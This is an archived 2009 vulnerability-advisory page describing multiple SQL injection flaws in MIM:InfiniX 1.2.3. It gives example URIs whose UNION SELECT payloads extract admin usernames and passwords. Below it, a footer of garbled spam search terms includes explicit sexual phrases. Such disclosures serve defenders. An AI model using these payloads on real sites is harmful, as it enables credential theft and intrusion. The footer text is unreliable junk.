about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , MIM:InfiniX Multiple SQL Injection Vulnerabilities


Title MIM:InfiniX Multiple SQL Injection Vulnerabilities
Published 2009-04-28-12:00AM
Updated 2009-04-29-05:46PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  YEnH4ckEr
Vulnerable  MIM:InfiniX MIM:InfiniX 1.2.3
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs and data are available:http://www.example.com/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6 FROM admin WHERE id=1/*http://www.example.com/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6+FROM+admin+WHERE+id=1/*&year=2009anything%')) union all select 1,database(),database(),concat(user,'--::--',pass),5,6,7,8,9,database(),11 FROM admin WHERE id=1#
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 08 Nov 2009 21:10:01 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
trisha nud www.colegi www.dizzle www.pegboa sexyanuty www.slin8. Www.tamila bypass htm e...modern www.58wbw. hash www.slin8. vbulletin bbs.xpxzlt forms full facki PHON EROTI trosha MS06-040 s www.worald all photo 18 win xp sp2 debian 3.1 www.Sexxx. Private Ke www.234mm. ash fuking hot free l news for c Sex garls. www.wapsex wabtrick . senetman.h Www.sekeel Www.sex400 premikular hfs directory protection rgod IceWarp We Www.sekeel desi baby Free xxxmo Dog Www.animal pinkems.co Www live s Www.Sexy